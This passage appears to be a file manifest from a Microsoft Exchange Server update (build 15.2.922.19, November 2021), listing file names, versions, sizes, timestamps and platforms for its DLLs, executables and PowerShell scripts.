3-Nov-21| 19:22| Not applicable \nCts_exsmime.dll| 15.2.922.19| 380,792| 3-Nov-21| 19:26| x64 \nCts_microsoft.exchange.data.common.dll| 15.2.922.19| 1,686,904| 3-Nov-21| 19:25| x86 \nCts_microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 513| 3-Nov-21| 19:22| Not applicable \nCts_policy.14.0.microsoft.exchange.data.common.dll| 15.2.922.19| 12,688| 3-Nov-21| 21:05| x86 \nCts_policy.14.1.microsoft.exchange.data.common.dll| 15.2.922.19| 12,688| 3-Nov-21| 19:22| x86 \nCts_policy.14.2.microsoft.exchange.data.common.dll| 15.2.922.19| 12,688| 3-Nov-21| 19:22| x86 \nCts_policy.14.3.microsoft.exchange.data.common.dll| 15.2.922.19| 12,680| 3-Nov-21| 19:24| x86 \nCts_policy.14.4.microsoft.exchange.data.common.dll| 15.2.922.19| 12,688| 3-Nov-21| 19:22| x86 \nCts_policy.15.0.microsoft.exchange.data.common.dll| 15.2.922.19| 12,688| 3-Nov-21| 19:22| x86 \nCts_policy.15.1.microsoft.exchange.data.common.dll| 15.2.922.19| 12,664| 3-Nov-21| 21:05| x86 \nCts_policy.15.2.microsoft.exchange.data.common.dll| 15.2.922.19| 12,680| 3-Nov-21| 19:24| x86 \nCts_policy.15.20.microsoft.exchange.data.common.dll| 15.2.922.19| 12,680| 3-Nov-21| 19:39| x86 \nCts_policy.8.0.microsoft.exchange.data.common.dll| 15.2.922.19| 12,680| 3-Nov-21| 21:05| x86 \nCts_policy.8.1.microsoft.exchange.data.common.dll| 15.2.922.19| 12,680| 3-Nov-21| 21:05| x86 \nCts_policy.8.2.microsoft.exchange.data.common.dll| 15.2.922.19| 12,664| 3-Nov-21| 19:24| x86 \nCts_policy.8.3.microsoft.exchange.data.common.dll| 15.2.922.19| 12,664| 3-Nov-21| 19:24| x86 \nDagcommonlibrary.ps1| Not applicable| 60,238| 3-Nov-21| 19:38| Not applicable \nDependentassemblygenerator.exe| 15.2.922.19| 22,408| 3-Nov-21| 19:25| x86 \nDiaghelper.dll| 15.2.922.19| 66,952| 3-Nov-21| 19:26| x86 \nDiagnosticscriptcommonlibrary.ps1| Not applicable| 16,346| 3-Nov-21| 21:04| Not applicable \nDisableinmemorytracing.ps1| Not applicable| 13,374| 3-Nov-21| 19:38| Not applicable \nDisable_antimalwarescanning.ps1| Not applicable| 15,221| 3-Nov-21| 19:38| Not applicable \nDisable_outsidein.ps1| Not applicable| 13,666| 3-Nov-21| 19:38| Not applicable \nDisklockerapi.dll| Not applicable| 22,416| 3-Nov-21| 19:26| x64 \nDlmigrationmodule.psm1| Not applicable| 39,592| 3-Nov-21| 19:38| Not applicable \nDsaccessperf.dll| 15.2.922.19| 45,968| 3-Nov-21| 19:38| x64 \nDscperf.dll| 15.2.922.19| 32,656| 3-Nov-21| 19:39| x64 \nDup_cts_microsoft.exchange.data.common.dll| 15.2.922.19| 1,686,904| 3-Nov-21| 19:25| x86 \nDup_ext_microsoft.exchange.data.transport.dll| 15.2.922.19| 601,480| 3-Nov-21| 21:04| x86 \nEcpperfcounters.xml| Not applicable| 31,180| 3-Nov-21| 19:21| Not applicable \nEdgeextensibility_microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 516| 3-Nov-21| 19:22| Not applicable \nEdgeextensibility_policy.8.0.microsoft.exchange.data.transport.dll| 15.2.922.19| 12,680| 3-Nov-21| 19:24| x86 \nEdgetransport.exe| 15.2.922.19| 49,544| 3-Nov-21| 21:10| x86 \nEext.14.0.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 516| 3-Nov-21| 19:22| Not applicable \nEext.14.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 516| 3-Nov-21| 19:22| Not applicable \nEext.14.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 516| 3-Nov-21| 19:22| Not applicable \nEext.14.3.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 516| 3-Nov-21| 19:22| Not applicable \nEext.14.4.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 516| 3-Nov-21| 19:22| Not applicable \nEext.15.0.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 516| 3-Nov-21| 19:22| Not applicable \nEext.15.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 516| 3-Nov-21| 19:22| Not applicable \nEext.15.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 516| 3-Nov-21| 19:22| Not applicable \nEext.15.20.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 516| 3-Nov-21| 19:22| Not applicable \nEext.8.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 516| 3-Nov-21| 19:22| Not applicable \nEext.8.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 516| 3-Nov-21| 19:22| Not applicable \nEext.8.3.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 516| 3-Nov-21| 19:22| Not applicable \nEext_policy.14.0.microsoft.exchange.data.transport.dll| 15.2.922.19| 12,680| 3-Nov-21| 19:25| x86 \nEext_policy.14.1.microsoft.exchange.data.transport.dll| 15.2.922.19| 12,680| 3-Nov-21| 19:24| x86 \nEext_policy.14.2.microsoft.exchange.data.transport.dll| 15.2.922.19| 12,688| 3-Nov-21| 21:06| x86 \nEext_policy.14.3.microsoft.exchange.data.transport.dll| 15.2.922.19| 12,688| 3-Nov-21| 19:22| x86 \nEext_policy.14.4.microsoft.exchange.data.transport.dll| 15.2.922.19| 12,680| 3-Nov-21| 19:23| x86 \nEext_policy.15.0.microsoft.exchange.data.transport.dll| 15.2.922.19| 12,664| 3-Nov-21| 19:25| x86 \nEext_policy.15.1.microsoft.exchange.data.transport.dll| 15.2.922.19| 12,688| 3-Nov-21| 19:39| x86 \nEext_policy.15.2.microsoft.exchange.data.transport.dll| 15.2.922.19| 12,680| 3-Nov-21| 19:39| x86 \nEext_policy.15.20.microsoft.exchange.data.transport.dll| 15.2.922.19| 13,192| 3-Nov-21| 19:24| x86 \nEext_policy.8.1.microsoft.exchange.data.transport.dll| 15.2.922.19| 12,688| 3-Nov-21| 19:22| x86 \nEext_policy.8.2.microsoft.exchange.data.transport.dll| 15.2.922.19| 12,664| 3-Nov-21| 19:25| x86 \nEext_policy.8.3.microsoft.exchange.data.transport.dll| 15.2.922.19| 12,664| 3-Nov-21| 19:26| x86 \nEnableinmemorytracing.ps1| Not applicable| 13,376| 3-Nov-21| 19:38| Not applicable \nEnable_antimalwarescanning.ps1| Not applicable| 17,575| 3-Nov-21| 19:38| Not applicable \nEnable_basicauthtooauthconverterhttpmodule.ps1| Not applicable| 18,600| 3-Nov-21| 19:38| Not applicable \nEnable_crossforestconnector.ps1| Not applicable| 18,610| 3-Nov-21| 19:38| Not applicable \nEnable_outlookcertificateauthentication.ps1| Not applicable| 22,928| 3-Nov-21| 19:38| Not applicable \nEnable_outsidein.ps1| Not applicable| 13,659| 3-Nov-21| 19:38| Not applicable \nEngineupdateserviceinterfaces.dll| 15.2.922.19| 17,800| 3-Nov-21| 21:05| x86 \nEscprint.dll| 15.2.922.19| 20,368| 3-Nov-21| 19:38| x64 \nEse.dll| 15.2.922.19| 3,741,072| 3-Nov-21| 19:38| x64 \nEseback2.dll| 15.2.922.19| 350,096| 3-Nov-21| 19:38| x64 \nEsebcli2.dll| 15.2.922.19| 318,328| 3-Nov-21| 19:38| x64 \nEseperf.dll| 15.2.922.19| 108,936| 3-Nov-21| 19:38| x64 \nEseutil.exe| 15.2.922.19| 425,352| 3-Nov-21| 21:05| x64 \nEsevss.dll| 15.2.922.19| 44,408| 3-Nov-21| 19:38| x64 \nEtweseproviderresources.dll| 15.2.922.19| 101,256| 3-Nov-21| 19:22| x64 \nEventperf.dll| 15.2.922.19| 59,784| 3-Nov-21| 19:25| x64 \nExchange.depthtwo.types.ps1xml| Not applicable| 40,085| 3-Nov-21| 21:55| Not applicable \nExchange.format.ps1xml| Not applicable| 649,717| 3-Nov-21| 21:55| Not applicable \nExchange.partial.types.ps1xml| Not applicable| 44,315| 3-Nov-21| 21:55| Not applicable \nExchange.ps1| Not applicable| 20,783| 3-Nov-21| 21:55| Not applicable \nExchange.support.format.ps1xml| Not applicable| 26,547| 3-Nov-21| 21:44| Not applicable \nExchange.types.ps1xml| Not applicable| 365,129| 3-Nov-21| 21:55| Not applicable \nExchangeudfcommon.dll| 15.2.922.19| 122,768| 3-Nov-21| 19:38| x86 \nExchangeudfs.dll| 15.2.922.19| 272,784| 3-Nov-21| 19:39| x86 \nExchmem.dll| 15.2.922.19| 86,416| 3-Nov-21| 19:27| x64 \nExchsetupmsg.dll| 15.2.922.19| 19,344| 3-Nov-21| 19:25| x64 \nExdbfailureitemapi.dll| Not applicable| 27,000| 3-Nov-21| 19:27| x64 \nExdbmsg.dll| 15.2.922.19| 230,792| 3-Nov-21| 19:25| x64 \nExeventperfplugin.dll| 15.2.922.19| 25,480| 3-Nov-21| 19:28| x64 \nExmime.dll| 15.2.922.19| 364,928| 3-Nov-21| 21:06| x64 \nExportedgeconfig.ps1| Not applicable| 27,403| 3-Nov-21| 19:38| Not applicable \nExport_mailpublicfoldersformigration.ps1| Not applicable| 18,570| 3-Nov-21| 19:38| Not applicable \nExport_modernpublicfolderstatistics.ps1| Not applicable| 29,218| 3-Nov-21| 19:38| Not applicable \nExport_outlookclassification.ps1| Not applicable| 14,390| 3-Nov-21| 19:38| Not applicable \nExport_publicfolderstatistics.ps1| Not applicable| 23,137| 3-Nov-21| 19:38| Not applicable \nExport_retentiontags.ps1| Not applicable| 17,056| 3-Nov-21| 19:38| Not applicable \nExppw.dll| 15.2.922.19| 83,336| 3-Nov-21| 19:24| x64 \nExprfdll.dll| 15.2.922.19| 26,488| 3-Nov-21| 19:30| x64 \nExrpc32.dll| 15.2.922.19| 2,029,456| 3-Nov-21| 21:04| x64 \nExrw.dll| 15.2.922.19| 28,024| 3-Nov-21| 19:26| x64 \nExsetdata.dll| 15.2.922.19| 2,779,024| 3-Nov-21| 21:06| x64 \nExsetup.exe| 15.2.922.19| 35,208| 3-Nov-21| 21:47| x86 \nExsetupui.exe| 15.2.922.19| 471,944| 3-Nov-21| 21:47| x86 \nExtrace.dll| 15.2.922.19| 245,128| 3-Nov-21| 19:25| x64 \nExt_microsoft.exchange.data.transport.dll| 15.2.922.19| 601,480| 3-Nov-21| 21:04| x86 \nExwatson.dll| 15.2.922.19| 44,944| 3-Nov-21| 19:26| x64 \nFastioext.dll| 15.2.922.19| 60,296| 3-Nov-21| 19:30| x64 \nFil06f84122c94c91a0458cad45c22cce20| Not applicable| 784,631| 3-Nov-21| 23:21| Not applicable \nFil143a7a5d4894478a85eefc89a6539fc8| Not applicable| 1,909,228| 3-Nov-21| 23:21| Not applicable \nFil19f527f284a0bb584915f9994f4885c3| Not applicable| 648,760| 3-Nov-21| 23:20| Not applicable \nFil1a9540363a531e7fb18ffe600cffc3ce| Not applicable| 358,405| 3-Nov-21| 23:21| Not applicable \nFil220d95210c8697448312eee6628c815c| Not applicable| 303,657| 3-Nov-21| 23:21| Not applicable \nFil2cf5a31e239a45fabea48687373b547c| Not applicable| 652,759| 3-Nov-21| 23:20| Not applicable \nFil397f0b1f1d7bd44d6e57e496decea2ec| Not applicable| 784,628| 3-Nov-21| 23:20| Not applicable \nFil3ab126057b34eee68c4fd4b127ff7aee| Not applicable| 784,604| 3-Nov-21| 23:20| Not applicable \nFil41bb2e5743e3bde4ecb1e07a76c5a7a8| Not applicable| 149,154| 3-Nov-21| 23:20| Not applicable \nFil51669bfbda26e56e3a43791df94c1e9c| Not applicable| 9,345| 3-Nov-21| 23:21| Not applicable \nFil558cb84302edfc96e553bcfce2b85286| Not applicable| 85,259| 3-Nov-21| 23:20| Not applicable \nFil55ce217251b77b97a46e914579fc4c64| Not applicable| 648,754| 3-Nov-21| 23:20| Not applicable \nFil5a9e78a51a18d05bc36b5e8b822d43a8| Not applicable| 1,596,145| 3-Nov-21| 23:20| Not applicable \nFil5c7d10e5f1f9ada1e877c9aa087182a9| Not applicable| 1,596,145| 3-Nov-21| 23:20| Not applicable \nFil6569a92c80a1e14949e4282ae2cc699c| Not applicable| 1,596,145| 3-Nov-21| 23:20| Not applicable \nFil6a01daba551306a1e55f0bf6894f4d9f| Not applicable| 648,730| 3-Nov-21| 23:20| Not applicable \nFil8863143ea7cd93a5f197c9fff13686bf| Not applicable| 648,760| 3-Nov-21| 23:20| Not applicable \nFil8a8c76f225c7205db1000e8864c10038| Not applicable| 1,596,145| 3-Nov-21| 23:20| Not applicable \nFil8cd999415d36ba78a3ac16a080c47458| Not applicable| 784,634| 3-Nov-21| 23:20| Not applicable \nFil97913e630ff02079ce9889505a517ec0| Not applicable| 1,596,145| 3-Nov-21| 23:20| Not applicable \nFilaa49badb2892075a28d58d06560f8da2| Not applicable| 785,658| 3-Nov-21| 23:21| Not applicable \nFilae28aeed23ccb4b9b80accc2d43175b5| Not applicable| 648,757| 3-Nov-21| 23:20| Not applicable \nFilb17f496f9d880a684b5c13f6b02d7203| Not applicable| 784,634| 3-Nov-21| 23:21| Not applicable \nFilb94ca32f2654692263a5be009c0fe4ca| Not applicable| 2,564,949| 3-Nov-21| 23:20| Not applicable \nFilbabdc4808eba0c4f18103f12ae955e5c| Not applicable| #########| 3-Nov-21| 23:20| Not applicable \nFilc92cf2bf29bed21bd5555163330a3d07| Not applicable| 652,777| 3-Nov-21| 23:20| Not applicable \nFilcc478d2a8346db20c4e2dc36f3400628| Not applicable| 784,634| 3-Nov-21| 23:21| Not applicable \nFild26cd6b13cfe2ec2a16703819da6d043| Not applicable| 1,596,145| 3-Nov-21| 23:20| Not applicable \nFilf2719f9dc8f7b74df78ad558ad3ee8a6| Not applicable| 785,640| 3-Nov-21| 23:22| Not applicable \nFilfa5378dc76359a55ef20cc34f8a23fee| Not applicable| 1,427,187| 3-Nov-21| 23:20| Not applicable \nFilteringconfigurationcommands.ps1| Not applicable| 18,243| 3-Nov-21| 19:38| Not applicable \nFilteringpowershell.dll| 15.2.922.19| 223,112| 3-Nov-21| 21:05| x86 \nFilteringpowershell.format.ps1xml| Not applicable| 29,664| 3-Nov-21| 21:05| Not applicable \nFiltermodule.dll| 15.2.922.19| 180,112| 3-Nov-21| 19:26| x64 \nFipexeuperfctrresource.dll| 15.2.922.19| 15,248| 3-Nov-21| 21:05| x64 \nFipexeventsresource.dll| 15.2.922.19| 44,920| 3-Nov-21| 19:26| x64 \nFipexperfctrresource.dll| 15.2.922.19| 32,656| 3-Nov-21| 21:05| x64 \nFirewallres.dll| 15.2.922.19| 72,592| 3-Nov-21| 19:24| x64 \nFms.exe| 15.2.922.19| 1,350,032| 3-Nov-21| 21:05| x64 \nForefrontactivedirectoryconnector.exe| 15.2.922.19| 110,968| 3-Nov-21| 19:27| x64 \nFpsdiag.exe| 15.2.922.19| 18,824| 3-Nov-21| 19:30| x86 \nFsccachedfilemanagedlocal.dll| 15.2.922.19| 822,136| 3-Nov-21| 19:26| x64 \nFscconfigsupport.dll| 15.2.922.19| 56,696| 3-Nov-21| 19:26| x86 \nFscconfigurationserver.exe| 15.2.922.19| 430,968| 3-Nov-21| 19:30| x64 \nFscconfigurationserverinterfaces.dll| 15.2.922.19| 15,752| 3-Nov-21| 19:31| x86 \nFsccrypto.dll| 15.2.922.19| 208,760| 3-Nov-21| 19:24| x64 \nFscipcinterfaceslocal.dll| 15.2.922.19| 28,552| 3-Nov-21| 19:24| x86 \nFscipclocal.dll| 15.2.922.19| 38,288| 3-Nov-21| 19:28| x86 \nFscsqmuploader.exe| 15.2.922.19| 453,488| 3-Nov-21| 19:38| x64 \nGetucpool.ps1| Not applicable| 19,787| 3-Nov-21| 19:38| Not applicable \nGetvalidengines.ps1| Not applicable| 13,286| 3-Nov-21| 21:04| Not applicable \nGet_antispamfilteringreport.ps1| Not applicable| 15,789| 3-Nov-21| 19:24| Not applicable \nGet_antispamsclhistogram.ps1| Not applicable| 14,651| 3-Nov-21| 19:24| Not applicable \nGet_antispamtopblockedsenderdomains.ps1| Not applicable| 15,723| 3-Nov-21| 19:24| Not applicable \nGet_antispamtopblockedsenderips.ps1| Not applicable| 14,771| 3-Nov-21| 19:24| Not applicable \nGet_antispamtopblockedsenders.ps1| Not applicable| 15,474| 3-Nov-21| 19:24| Not applicable \nGet_antispamtoprblproviders.ps1| Not applicable| 14,685| 3-Nov-21| 19:24| Not applicable \nGet_antispamtoprecipients.ps1| Not applicable| 14,786| 3-Nov-21| 19:24| Not applicable \nGet_dleligibilitylist.ps1| Not applicable| 42,348| 3-Nov-21| 19:38| Not applicable \nGet_exchangeetwtrace.ps1| Not applicable| 28,959| 3-Nov-21| 19:38| Not applicable \nGet_publicfoldermailboxsize.ps1| Not applicable| 15,038| 3-Nov-21| 19:38| Not applicable \nGet_storetrace.ps1| Not applicable| 51,883| 3-Nov-21| 19:38| Not applicable \nHuffman_xpress.dll| 15.2.922.19| 32,656| 3-Nov-21| 19:25| x64 \nImportedgeconfig.ps1| Not applicable| 77,260| 3-Nov-21| 19:38| Not applicable \nImport_mailpublicfoldersformigration.ps1| Not applicable| 29,492| 3-Nov-21| 19:38| Not applicable \nImport_retentiontags.ps1| Not applicable| 28,830| 3-Nov-21| 19:38| Not applicable \nInproxy.dll| 15.2.922.19| 85,896| 3-Nov-21| 19:25| x64 \nInstallwindowscomponent.ps1| Not applicable| 34,555| 3-Nov-21| 19:38| Not applicable \nInstall_antispamagents.ps1| Not applicable| 17,925| 3-Nov-21| 19:24| Not applicable \nInstall_odatavirtualdirectory.ps1| Not applicable| 17,999| 3-Nov-21| 22:21| Not applicable \nInterop.activeds.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 15.2.922.19| 107,384| 3-Nov-21| 19:25| Not applicable \nInterop.adsiis.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 15.2.922.19| 20,344| 3-Nov-21| 19:26| Not applicable \nInterop.certenroll.dll| 15.2.922.19| 142,736| 3-Nov-21| 19:22| x86 \nInterop.licenseinfointerface.dll| 15.2.922.19| 14,216| 3-Nov-21| 19:38| x86 \nInterop.netfw.dll| 15.2.922.19| 34,192| 3-Nov-21| 19:24| x86 \nInterop.plalibrary.dll| 15.2.922.19| 72,568| 3-Nov-21| 19:38| x86 \nInterop.stdole2.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 15.2.922.19| 27,024| 3-Nov-21| 19:24| Not applicable \nInterop.taskscheduler.dll| 15.2.922.19| 46,456| 3-Nov-21| 19:30| x86 \nInterop.wuapilib.dll| 15.2.922.19| 60,808| 3-Nov-21| 19:24| x86 \nInterop.xenroll.dll| 15.2.922.19| 39,824| 3-Nov-21| 19:22| x86 \nKerbauth.dll| 15.2.922.19| 62,864| 3-Nov-21| 19:38| x64 \nLicenseinfointerface.dll| 15.2.922.19| 643,472| 3-Nov-21| 19:38| x64 \nLpversioning.xml| Not applicable| 20,422| 3-Nov-21| 21:47| Not applicable \nMailboxdatabasereseedusingspares.ps1| Not applicable| 31,916| 3-Nov-21| 19:38| Not applicable \nManagedavailabilitycrimsonmsg.dll| 15.2.922.19| 138,616| 3-Nov-21| 19:26| x64 \nManagedstorediagnosticfunctions.ps1| Not applicable| 126,249| 3-Nov-21| 19:38| Not applicable \nManagescheduledtask.ps1| Not applicable| 36,372| 3-Nov-21| 19:38| Not applicable \nManage_metacachedatabase.ps1| Not applicable| 51,099| 3-Nov-21| 19:38| Not applicable \nMce.dll| 15.2.922.19| 1,693,064| 3-Nov-21| 19:39| x64 \nMeasure_storeusagestatistics.ps1| Not applicable| 29,499| 3-Nov-21| 19:38| Not applicable \nMerge_publicfoldermailbox.ps1| Not applicable| 22,635| 3-Nov-21| 19:38| Not applicable \nMicrosoft.database.isam.dll| 15.2.922.19| 127,880| 3-Nov-21| 19:38| x86 \nMicrosoft.dkm.proxy.dll| 15.2.922.19| 25,976| 3-Nov-21| 19:38| x86 \nMicrosoft.exchange.activemonitoring.activemonitoringvariantconfig.dll| 15.2.922.19| 68,488| 3-Nov-21| 21:04| x86 \nMicrosoft.exchange.activemonitoring.eventlog.dll| 15.2.922.19| 17,792| 3-Nov-21| 19:25| x64 \nMicrosoft.exchange.addressbook.service.dll| 15.2.922.19| 233,360| 3-Nov-21| 21:39| x86 \nMicrosoft.exchange.addressbook.service.eventlog.dll| 15.2.922.19| 15,752| 3-Nov-21| 19:25| x64 \nMicrosoft.exchange.airsync.airsyncmsg.dll| 15.2.922.19| 43,408| 3-Nov-21| 21:06| x64 \nMicrosoft.exchange.airsync.comon.dll| 15.2.922.19| 1,776,008| 3-Nov-21| 21:14| x86 \nMicrosoft.exchange.airsync.dll1| 15.2.922.19| 505,224| 3-Nov-21| 22:14| Not applicable \nMicrosoft.exchange.airsynchandler.dll| 15.2.922.19| 76,168| 3-Nov-21| 22:17| x86 \nMicrosoft.exchange.anchorservice.dll| 15.2.922.19| 135,568| 3-Nov-21| 21:04| x86 \nMicrosoft.exchange.antispam.eventlog.dll| 15.2.922.19| 23,440| 3-Nov-21| 19:24| x64 \nMicrosoft.exchange.antispamupdate.eventlog.dll| 15.2.922.19| 15,760| 3-Nov-21| 19:24| x64 \nMicrosoft.exchange.antispamupdatesvc.exe| 15.2.922.19| 27,000| 3-Nov-21| 21:11| x86 \nMicrosoft.exchange.approval.applications.dll| 15.2.922.19| 53,624| 3-Nov-21| 21:10| x86 \nMicrosoft.exchange.assistants.dll| 15.2.922.19| 925,048| 3-Nov-21| 21:04| x86 \nMicrosoft.exchange.assistants.eventlog.dll| 15.2.922.19| 26,000| 3-Nov-21| 21:06| x64 \nMicrosoft.exchange.assistants.interfaces.dll| 15.2.922.19| 43,408| 3-Nov-21| 21:04| x86 \nMicrosoft.exchange.audit.azureclient.dll| 15.2.922.19| 15,224| 3-Nov-21| 21:47| x86 \nMicrosoft.exchange.auditlogsearch.eventlog.dll| 15.2.922.19| 14,736| 3-Nov-21| 19:24| x64 \nMicrosoft.exchange.auditlogsearchservicelet.dll| 15.2.922.19| 70,536| 3-Nov-21| 21:37| x86 \nMicrosoft.exchange.auditstoragemonitorservicelet.dll| 15.2.922.19| 94,600| 3-Nov-21| 21:55| x86 \nMicrosoft.exchange.auditstoragemonitorservicelet.eventlog.dll| 15.2.922.19| 13,200| 3-Nov-21| 19:22| x64 \nMicrosoft.exchange.authadmin.eventlog.dll| 15.2.922.19| 15,752| 3-Nov-21| 19:25| x64 \nMicrosoft.exchange.authadminservicelet.dll| 15.2.922.19| 36,744| 3-Nov-21| 21:37| x86 \nMicrosoft.exchange.authservicehostservicelet.dll| 15.2.922.19| 15,736| 3-Nov-21| 21:06| x86 \nMicrosoft.exchange.autodiscover.configuration.dll| 15.2.922.19| 79,736| 3-Nov-21| 21:05| x86 \nMicrosoft.exchange.autodiscover.dll| 15.2.922.19| 396,176| 3-Nov-21| 21:17| x86 \nMicrosoft.exchange.autodiscover.eventlogs.dll| 15.2.922.19| 21,384| 3-Nov-21| 19:39| x64 \nMicrosoft.exchange.autodiscoverv2.dll| 15.2.922.19| 57,216| 3-Nov-21| 21:19| x86 \nMicrosoft.exchange.bandwidthmonitorservicelet.dll| 15.2.922.19| 14,736| 3-Nov-21| 21:10| x86 \nMicrosoft.exchange.batchservice.dll| 15.2.922.19| 35,712| 3-Nov-21| 21:10| x86 \nMicrosoft.exchange.cabutility.dll| 15.2.922.19| 276,344| 3-Nov-21| 19:24| x64 \nMicrosoft.exchange.certificatedeployment.eventlog.dll| 15.2.922.19| 16,264| 3-Nov-21| 19:25| x64 \nMicrosoft.exchange.certificatedeploymentservicelet.dll| 15.2.922.19| 26,000| 3-Nov-21| 21:38| x86 \nMicrosoft.exchange.certificatenotification.eventlog.dll| 15.2.922.19| 13,704| 3-Nov-21| 21:05| x64 \nMicrosoft.exchange.certificatenotificationservicelet.dll| 15.2.922.19| 23,432| 3-Nov-21| 21:39| x86 \nMicrosoft.exchange.clients.common.dll| 15.2.922.19| 378,256| 3-Nov-21| 21:06| x86 \nMicrosoft.exchange.clients.eventlogs.dll| 15.2.922.19| 83,832| 3-Nov-21| 19:26| x64 \nMicrosoft.exchange.clients.owa.dll| 15.2.922.19| 2,971,016| 3-Nov-21| 22:17| x86 \nMicrosoft.exchange.clients.owa2.server.dll| 15.2.922.19| 5,029,768| 3-Nov-21| 22:13| x86 \nMicrosoft.exchange.clients.owa2.servervariantconfiguration.dll| 15.2.922.19| 893,832| 3-Nov-21| 21:05| x86 \nMicrosoft.exchange.clients.security.dll| 15.2.922.19| 413,576| 3-Nov-21| 21:52| x86 \nMicrosoft.exchange.clients.strings.dll| 15.2.922.19| 924,560| 3-Nov-21| 19:30| x86 \nMicrosoft.exchange.cluster.bandwidthmonitor.dll| 15.2.922.19| 31,608| 3-Nov-21| 21:10| x86 \nMicrosoft.exchange.cluster.common.dll| 15.2.922.19| 52,112| 3-Nov-21| 19:22| x86 \nMicrosoft.exchange.cluster.common.extensions.dll| 15.2.922.19| 21,904| 3-Nov-21| 21:04| x86 \nMicrosoft.exchange.cluster.diskmonitor.dll| 15.2.922.19| 33,680| 3-Nov-21| 21:10| x86 \nMicrosoft.exchange.cluster.replay.dll| 15.2.922.19| 3,564,424| 3-Nov-21| 21:10| x86 \nMicrosoft.exchange.cluster.replicaseeder.dll| 15.2.922.19| 108,432| 3-Nov-21| 19:38| x64 \nMicrosoft.exchange.cluster.replicavsswriter.dll| 15.2.922.19| 288,656| 3-Nov-21| 21:10| x64 \nMicrosoft.exchange.cluster.shared.dll| 15.2.922.19| 627,600| 3-Nov-21| 21:04| x86 \nMicrosoft.exchange.common.agentconfig.transport.dll| 15.2.922.19| 86,408| 3-Nov-21| 21:05| x86 \nMicrosoft.exchange.common.componentconfig.transport.dll| 15.2.922.19| 1,830,264| 3-Nov-21| 21:04| x86 \nMicrosoft.exchange.common.directory.adagentservicevariantconfig.dll| 15.2.922.19| 31,624| 3-Nov-21| 21:04| x86 \nMicrosoft.exchange.common.directory.directoryvariantconfig.dll| 15.2.922.19| 466,296| 3-Nov-21| 21:04| x86 \nMicrosoft.exchange.common.directory.domtvariantconfig.dll| 15.2.922.19| 25,992| 3-Nov-21| 21:04| x86 \nMicrosoft.exchange.common.directory.ismemberofresolverconfig.dll| 15.2.922.19| 38,280| 3-Nov-21| 21:05| x86 \nMicrosoft.exchange.common.directory.tenantrelocationvariantconfig.dll| 15.2.922.19| 102,800| 3-Nov-21| 21:05| x86 \nMicrosoft.exchange.common.directory.topologyservicevariantconfig.dll| 15.2.922.19| 48,504| 3-Nov-21| 21:04| x86 \nMicrosoft.exchange.common.diskmanagement.dll| 15.2.922.19| 67,456| 3-Nov-21| 19:38| x86 \nMicrosoft.exchange.common.dll| 15.2.922.19| 172,944| 3-Nov-21| 19:38| x86 \nMicrosoft.exchange.common.encryption.variantconfig.dll| 15.2.922.19| 113,544| 3-Nov-21| 21:05| x86 \nMicrosoft.exchange.common.il.dll| 15.2.922.19| 13,712| 3-Nov-21| 19:22| x86 \nMicrosoft.exchange.common.inference.dll| 15.2.922.19| 130,424| 3-Nov-21| 21:04| x86 \nMicrosoft.exchange.common.optics.dll| 15.2.922.19| 63,888| 3-Nov-21| 19:38| x86 \nMicrosoft.exchange.common.processmanagermsg.dll| 15.2.922.19| 19,856| 3-Nov-21| 19:25| x64 \nMicrosoft.exchange.common.protocols.popimap.dll| 15.2.922.19| 15,248| 3-Nov-21| 19:22| x86 \nMicrosoft.exchange.common.search.dll| 15.2.922.19| 108,936| 3-Nov-21| 21:04| x86 \nMicrosoft.exchange.common.search.eventlog.dll| 15.2.922.19| 17,800| 3-Nov-21| 19:25| x64 \nMicrosoft.exchange.common.smtp.dll| 15.2.922.19| 51,576| 3-Nov-21| 21:05| x86 \nMicrosoft.exchange.common.suiteservices.suiteservicesvariantconfig.dll| 15.2.922.19| 36,752| 3-Nov-21| 21:04| x86 \nMicrosoft.exchange.common.transport.azure.dll| 15.2.922.19| 27,536| 3-Nov-21| 19:38| x86 \nMicrosoft.exchange.common.transport.monitoringconfig.dll| 15.2.922.19| 1,042,312| 3-Nov-21| 21:05| x86 \nMicrosoft.exchange.commonmsg.dll| 15.2.922.19| 29,072| 3-Nov-21| 19:25| x64 \nMicrosoft.exchange.compliance.auditlogpumper.messages.dll| 15.2.922.19| 13,192| 3-Nov-21| 21:06| x64 \nMicrosoft.exchange.compliance.auditservice.core.dll| 15.2.922.19| 181,112| 3-Nov-21| 21:56| x86 \nMicrosoft.exchange.compliance.auditservice.messages.dll| 15.2.922.19| 30,096| 3-Nov-21| 19:22| x64 \nMicrosoft.exchange.compliance.common.dll| 15.2.922.19| 22,416| 3-Nov-21| 21:05| x86 \nMicrosoft.exchange.compliance.crimsonevents.dll| 15.2.922.19| 85,888| 3-Nov-21| 19:23| x64 \nMicrosoft.exchange.compliance.dll| 15.2.922.19| 35,208| 3-Nov-21| 19:38| x86 \nMicrosoft.exchange.compliance.recordreview.dll| 15.2.922.19| 37,256| 3-Nov-21| 19:38| x86 \nMicrosoft.exchange.compliance.supervision.dll| 15.2.922.19| 50,576| 3-Nov-21| 21:10| x86 \nMicrosoft.exchange.compliance.taskcreator.dll| 15.2.922.19| 33,144| 3-Nov-21| 21:05| x86 \nMicrosoft.exchange.compliance.taskdistributioncommon.dll| 15.2.922.19| 1,100,176| 3-Nov-21| 21:05| x86 \nMicrosoft.exchange.compliance.taskdistributionfabric.dll| 15.2.922.19| 206,712| 3-Nov-21| 21:05| x86 \nMicrosoft.exchange.compliance.taskplugins.dll| 15.2.922.19| 210,808| 3-Nov-21| 21:21| x86 \nMicrosoft.exchange.compression.dll| 15.2.922.19| 17,296| 3-Nov-21| 21:04| x86 